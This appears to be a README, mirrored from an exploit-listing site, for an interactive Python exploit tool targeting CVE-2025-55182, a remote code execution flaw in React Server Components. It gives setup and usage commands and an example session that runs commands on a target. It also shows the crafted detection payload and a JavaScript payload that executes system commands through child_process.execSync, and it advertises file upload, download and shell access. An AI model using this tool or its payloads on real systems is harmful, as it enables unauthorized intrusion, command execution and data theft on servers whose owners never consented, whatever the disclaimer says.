## https://sploitus.com/exploit?id=CC20A272-BC98-5D81-86CF-92D732C928ED
# CVE-2025-55182-shellinteractive
Base used from:
https://github.com/Emiyelbarto/CVE-2025-55182-PoC
Thank you very much for the great contribution.
## Overview
CVE-2025-55182 is a deserialization vulnerability in Next.js/React Server Components that allows unauthenticated remote attackers to execute arbitrary code on affected servers. The vulnerability stems from improper handling of serialized data in React Server Actions.
### Key Features:
- โ Interactive shell with command history and autocompletion
- โ Automatic vulnerability detection
- โ Remote command execution
- โ File upload/download capabilities
- โ Built-in test suite
- โ Configurable target parameters
## Installation
### Prerequisites
- Python 3.8 or higher
- `requests` library
### Quick Setup
```bash
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma
# Install dependencies
pip install requests
# Make script executable (optional)
chmod +x hokma.py
```
## Usage
### Basic Usage
```bash
# Start interactive shell
python hokma.py
# Check vulnerability only
python hokma.py -u http://target.com --check
# Execute single command
python hokma.py -u http://target.com -c "whoami"
```
### Interactive Shell Commands
```
help Show this help message
set URL Set target URL
set ID Set action ID (default: user-profile-action)
show Show current options
check [url] Check if target is vulnerable
exploit Execute command on target
shell Start interactive command shell
test Run test commands (id, whoami, etc.)
upload Upload local file to target
download Download remote file (base64 encoded)
clear Clear screen
exit/quit Exit the shell
```
### Example Session
```bash
$ python hokma.py
____ _ ____ _ _ _
| _ \ ___ __ _ ___| |_ / ___|| |__ ___| | |
| |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
| _ set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com
hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!
hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200
--- COMMAND OUTPUT ---
www-data
----------------------
hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd
--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit
```
## Configuration Options
| Option | Default | Description |
|--------|---------|-------------|
| Target URL | None | URL of the vulnerable application |
| Action ID | `user-profile-action` | Server Action ID to target |
| Timeout | 3 seconds | Request timeout |
## Technical Details
### Vulnerability Detection
The tool sends a specially crafted multipart request that triggers a crash in vulnerable systems:
- Uses the payload: `["$1:a:a"]` with an empty object `{}`
- Detects vulnerability through HTTP 500 responses or specific error patterns
### Exploitation Mechanism
1. **JavaScript Payload Construction**: Creates a Node.js script using the Function constructor
2. **Child Process Execution**: Uses `child_process.execSync()` to run system commands
3. **Response Extraction**: Captures and displays command output
### Payload Structure
```javascript
const cmd = "COMMAND";
return import('child_process').then(cp => {
try {
const output = cp.execSync(cmd).toString();
return output;
} catch(e) {
return "Command Execution Failed: " + e.message;
}
});
```
## Ethical Use & Disclaimer
**IMPORTANT LEGAL NOTICE**
This tool is intended for:
- Authorized security testing
- Educational purposes
- Vulnerability research with proper consent
**DO NOT** use this tool against systems you don't own or have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
The developers are not responsible for any misuse of this tool. Users must comply with all applicable laws and obtain proper authorization before testing.
## Known Limitations
1. **Target Requirements**:
- Node.js server with React Server Components
- Vulnerable to CVE-2025-55182
- Child process module available
2. **Detection Limitations**:
- May produce false positives/negatives
- Depends on specific error responses
3. **Exploitation Constraints**:
- Commands execute with server process privileges
- Output may be truncated in some cases
- Complex commands may require special escaping